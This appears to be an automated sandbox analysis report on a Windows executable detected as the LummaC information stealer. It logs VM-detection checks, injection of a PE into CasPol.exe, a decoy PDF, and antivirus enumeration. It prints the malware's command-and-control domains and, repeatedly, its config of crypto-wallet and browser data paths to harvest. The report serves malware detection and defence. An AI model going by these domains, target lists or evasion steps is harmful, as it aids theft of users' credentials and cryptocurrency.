Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\BigProject.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: BigProject.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: BigProject.exe

Static file information: File size 1600512 > 1048576

Source: BigProject.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x16a800

Source: BigProject.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: BigProject.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: C:\Users\user\Desktop\BigProject.exe	Code function: 0_2_00B4508F push esp; iretd	0_2_00B45090
Source: C:\Users\user\Desktop\BigProject.exe	Code function: 0_2_00B460F2 pushad ; ret	0_2_00B460F3
Source: C:\Users\user\Desktop\BigProject.exe	Code function: 0_2_00B450C3 pushad ; ret	0_2_00B450DF
Source: C:\Users\user\Desktop\BigProject.exe	Code function: 0_2_00B44833 pushad ; ret	0_2_00B44834
Source: C:\Users\user\Desktop\BigProject.exe	Code function: 0_2_00CA5860 push eax; ret	0_2_00CA587E
Source: C:\Users\user\Desktop\BigProject.exe	Code function: 0_2_00B45847 pushad ; ret	0_2_00B45848
Source: C:\Users\user\Desktop\BigProject.exe	Code function: 0_2_00B45980 pushad ; ret	0_2_00B4598A
Source: C:\Users\user\Desktop\BigProject.exe	Code function: 0_2_00B46982 pushad ; ret	0_2_00B4699E
Source: C:\Users\user\Desktop\BigProject.exe	Code function: 0_2_00B45909 push ebp; retf 0015h	0_2_00B4590A
Source: C:\Users\user\Desktop\BigProject.exe	Code function: 0_2_00B452BA push ebp; retf	0_2_00B452BB
Source: C:\Users\user\Desktop\BigProject.exe	Code function: 0_2_00B46234 pushad ; ret	0_2_00B46235
Source: C:\Users\user\Desktop\BigProject.exe	Code function: 0_2_00B47248 pushad ; ret	0_2_00B47249
Source: C:\Users\user\Desktop\BigProject.exe	Code function: 0_2_00B47364 pushad ; ret	0_2_00B4738B
Source: C:\Users\user\Desktop\BigProject.exe	Code function: 0_2_00B45DB2 push esi; retn 0015h	0_2_00B45DB3
Source: C:\Users\user\Desktop\BigProject.exe	Code function: 0_2_00B4359B pushad ; ret	0_2_00B4359C
Source: C:\Users\user\Desktop\BigProject.exe	Code function: 0_2_00B446F1 pushad ; ret	0_2_00B446F2
Source: C:\Users\user\Desktop\BigProject.exe	Code function: 0_2_00B43E46 pushad ; ret	0_2_00B43E47
Source: C:\Users\user\Desktop\BigProject.exe	Code function: 0_2_00B44F9C pushad ; ret	0_2_00B44F9D
Source: C:\Users\user\Desktop\BigProject.exe	Code function: 0_2_00B43F7F pushad ; ret	0_2_00B43F89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_0043D810 push eax; mov dword ptr [esp], 707F7E0Dh	7_2_0043D812
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_00443469 push ebp; iretd	7_2_0044346C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_0044366E push 9F00CD97h; ret	7_2_004436B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_0043AE30 push eax; mov dword ptr [esp], 1D1E1F10h	7_2_0043AE3E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_0044171E push esp; ret	7_2_0044171F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_004477A5 push ebp; iretd	7_2_004477AA

Source: C:\Users\user\Desktop\BigProject.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior

Source: C:\Users\user\Desktop\BigProject.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7472

Thread sleep time: -120000s >= -30000s

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\BigProject.exe

Code function: 0_2_00C17458 GetSystemInfo,

0_2_00C17458

Source: CasPol.exe, 00000007.00000002.2450746382.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWhf
Source: CasPol.exe, 00000007.00000002.2450746382.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWJ?Q
Source: BigProject.exe, 00000000.00000002.2453321140.000000000113E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH~
Source: BigProject.exe, 00000000.00000002.2453321140.00000000011A0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.2450746382.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 7_2_0043C1F0 LdrInitializeThunk,

7_2_0043C1F0

Source: C:\Users\user\Desktop\BigProject.exe

Code function: 0_2_00CA53A4 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00CA53A4

Source: C:\Users\user\Desktop\BigProject.exe	Code function: 0_2_00CA53A4 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00CA53A4
Source: C:\Users\user\Desktop\BigProject.exe	Code function: 0_2_00CA55FE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_00CA55FE

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\BigProject.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\BigProject.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: BigProject.exe, 00000000.00000003.2452421280.0000000003A21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: rapeflowwj.lat
Source: BigProject.exe, 00000000.00000003.2452421280.0000000003A21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: crosshuaht.lat
Source: BigProject.exe, 00000000.00000003.2452421280.0000000003A21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: sustainskelet.lat
Source: BigProject.exe, 00000000.00000003.2452421280.0000000003A21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: aspecteirs.lat
Source: BigProject.exe, 00000000.00000003.2452421280.0000000003A21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: energyaffai.lat
Source: BigProject.exe, 00000000.00000003.2452421280.0000000003A21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: necklacebudi.lat
Source: BigProject.exe, 00000000.00000003.2452421280.0000000003A21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: discokeyus.lat
Source: BigProject.exe, 00000000.00000003.2452421280.0000000003A21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: grannyejh.lat

Writes to foreign memory regions

Source: C:\Users\user\Desktop\BigProject.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 440000	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 443000	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 452000	Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 861008	Jump to behavior

Source: C:\Users\user\Desktop\BigProject.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\NavanItinerary.pdf"			Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\BigProject.exe

Code function: 0_2_00CA5294 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00CA5294

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 Blob

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 7404, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: CasPol.exe, 00000007.00000002.2450915117.0000000000D93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: top\\Local Storage\\leveldb","m":[""],"z":"Wallets/Authy Desktop","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Bitcoin\\wallets","m":[""],"z":"Wallets/Bitcoin core","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":[""],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":[""],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":[""],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":[""],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":[""],"z":"Wallets/Guarda","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\DashCore\\wallets","m":[".dat"],"z":"Wallets/DashCore","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\WalletWasabi\\Client\\Wallets","m":[""],"z":"Wallets/Wasabi","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Daedalus Mainnet\\wallets","m":["she..sqlite"],"z":"Wallets/Daedalus","d":0,"fs":20971520},{"t":1,"p":"%localappdata%\\Google\\Chrome\\User Data","z":"Chrome","f":"Google Chrome","n":"chrome.exe","l":"chrome.dll"},{"t":1,"p":"%localappdata%\\Google\\Chrome Beta\\User Data","z":"Chrome Beta","f":"Google Chrome Beta","n":"chrome.exe","l":"chrome.dll"},{"t":1,"p":"%appdata%\\Opera Software\\Opera Stable","z":"Opera","n":"opera.exe"},{"t":1,"p":"%localappdata%\\Opera Software\\Opera Neon\\User Data","z":"Opera Neon"},{"t":1,"p":"%appdata%\\Opera Software\\Opera GX Stable","z":"Opera GX Stable","n":"opera.exe"},{"t":1,"p":"%localappdata%\\Microsoft\\Edge\\User Data","z":"Edge","f":"Microsoft Edge","n":"msedge.exe","l":"msedge.dll"},{"t":1,"p":"%localappdata%\\BraveSoftware\\Brave-Browser\\User Data","z":"Brave","f":"BraveSoftware Brave-Browser","n":"brave.exe","l":"chrome.dll"},{"t":1,"p":"%local
Source: CasPol.exe, 00000007.00000002.2450915117.0000000000D93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: top\\Local Storage\\leveldb","m":[""],"z":"Wallets/Authy Desktop","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Bitcoin\\wallets","m":[""],"z":"Wallets/Bitcoin core","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":[""],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":[""],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":[""],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":[""],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":[""],"z":"Wallets/Guarda","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\DashCore\\wallets","m":[".dat"],"z":"Wallets/DashCore","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\WalletWasabi\\Client\\Wallets","m":[""],"z":"Wallets/Wasabi","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Daedalus Mainnet\\wallets","m":["she..sqlite"],"z":"Wallets/Daedalus","d":0,"fs":20971520},{"t":1,"p":"%localappdata%\\Google\\Chrome\\User Data","z":"Chrome","f":"Google Chrome","n":"chrome.exe","l":"chrome.dll"},{"t":1,"p":"%localappdata%\\Google\\Chrome Beta\\User Data","z":"Chrome Beta","f":"Google Chrome Beta","n":"chrome.exe","l":"chrome.dll"},{"t":1,"p":"%appdata%\\Opera Software\\Opera Stable","z":"Opera","n":"opera.exe"},{"t":1,"p":"%localappdata%\\Opera Software\\Opera Neon\\User Data","z":"Opera Neon"},{"t":1,"p":"%appdata%\\Opera Software\\Opera GX Stable","z":"Opera GX Stable","n":"opera.exe"},{"t":1,"p":"%localappdata%\\Microsoft\\Edge\\User Data","z":"Edge","f":"Microsoft Edge","n":"msedge.exe","l":"msedge.dll"},{"t":1,"p":"%localappdata%\\BraveSoftware\\Brave-Browser\\User Data","z":"Brave","f":"BraveSoftware Brave-Browser","n":"brave.exe","l":"chrome.dll"},{"t":1,"p":"%local
Source: CasPol.exe, 00000007.00000002.2450915117.0000000000D93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: top\\Local Storage\\leveldb","m":[""],"z":"Wallets/Authy Desktop","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Bitcoin\\wallets","m":[""],"z":"Wallets/Bitcoin core","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":[""],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":[""],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":[""],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":[""],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":[""],"z":"Wallets/Guarda","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\DashCore\\wallets","m":[".dat"],"z":"Wallets/DashCore","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\WalletWasabi\\Client\\Wallets","m":[""],"z":"Wallets/Wasabi","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Daedalus Mainnet\\wallets","m":["she..sqlite"],"z":"Wallets/Daedalus","d":0,"fs":20971520},{"t":1,"p":"%localappdata%\\Google\\Chrome\\User Data","z":"Chrome","f":"Google Chrome","n":"chrome.exe","l":"chrome.dll"},{"t":1,"p":"%localappdata%\\Google\\Chrome Beta\\User Data","z":"Chrome Beta","f":"Google Chrome Beta","n":"chrome.exe","l":"chrome.dll"},{"t":1,"p":"%appdata%\\Opera Software\\Opera Stable","z":"Opera","n":"opera.exe"},{"t":1,"p":"%localappdata%\\Opera Software\\Opera Neon\\User Data","z":"Opera Neon"},{"t":1,"p":"%appdata%\\Opera Software\\Opera GX Stable","z":"Opera GX Stable","n":"opera.exe"},{"t":1,"p":"%localappdata%\\Microsoft\\Edge\\User Data","z":"Edge","f":"Microsoft Edge","n":"msedge.exe","l":"msedge.dll"},{"t":1,"p":"%localappdata%\\BraveSoftware\\Brave-Browser\\User Data","z":"Brave","f":"BraveSoftware Brave-Browser","n":"brave.exe","l":"chrome.dll"},{"t":1,"p":"%local
Source: CasPol.exe, 00000007.00000002.2450915117.0000000000D93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: top\\Local Storage\\leveldb","m":[""],"z":"Wallets/Authy Desktop","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Bitcoin\\wallets","m":[""],"z":"Wallets/Bitcoin core","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":[""],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":[""],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":[""],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":[""],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":[""],"z":"Wallets/Guarda","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\DashCore\\wallets","m":[".dat"],"z":"Wallets/DashCore","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\WalletWasabi\\Client\\Wallets","m":[""],"z":"Wallets/Wasabi","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Daedalus Mainnet\\wallets","m":["she..sqlite"],"z":"Wallets/Daedalus","d":0,"fs":20971520},{"t":1,"p":"%localappdata%\\Google\\Chrome\\User Data","z":"Chrome","f":"Google Chrome","n":"chrome.exe","l":"chrome.dll"},{"t":1,"p":"%localappdata%\\Google\\Chrome Beta\\User Data","z":"Chrome Beta","f":"Google Chrome Beta","n":"chrome.exe","l":"chrome.dll"},{"t":1,"p":"%appdata%\\Opera Software\\Opera Stable","z":"Opera","n":"opera.exe"},{"t":1,"p":"%localappdata%\\Opera Software\\Opera Neon\\User Data","z":"Opera Neon"},{"t":1,"p":"%appdata%\\Opera Software\\Opera GX Stable","z":"Opera GX Stable","n":"opera.exe"},{"t":1,"p":"%localappdata%\\Microsoft\\Edge\\User Data","z":"Edge","f":"Microsoft 